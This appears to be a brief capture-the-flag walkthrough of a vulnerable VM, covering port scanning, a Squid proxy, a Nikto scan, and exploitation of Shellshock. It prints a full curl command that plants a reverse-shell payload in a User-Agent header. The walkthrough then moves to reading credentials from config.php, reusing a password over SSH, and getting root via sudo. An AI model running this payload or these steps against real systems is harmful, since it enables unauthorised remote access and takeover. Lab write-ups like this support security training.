A scan shows port 22 and 3128 open, but port 8080 is closed and is an http-proxy.

3128 shows that it’s a squid proxy, so I set my proxy settings in Firefox to that port.

Going to the IP now shows a website

Nikto scan using the proxy settings reveals a few interesting things

nikto --useproxy 192.168.218.140:3128 -h 192.168.218.140

With the most interesting being shellshock

I also ran it through dirbuster (had to also configure proxy settings) and came up with a few interesting directories but nothing out of the ordinary. I decided to pursue the shellshock vulnerability first.

curl -x http://192.168.218.140:3128 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.218.129/1234 0>&1" http://192.168.218.140/cgi-bin/status

Following my privilege escalation Workflowy list, I checked the config.php file located in /var/www/wolfcms and find mysql credentials

I try to login but it never opens a Mysql prompt

So back to square one.

I did have a password, john@123 so possibly there was password reuse. I do

cat /etc/passwd

to view the users.

I try the password via SSH with user sickos and it works!

I then check the bash history which reveals the command sudo su

which works and I am now root

Aside from the MySql issue, I didn’t run into any other issues with this VM so I actually enjoyed this one.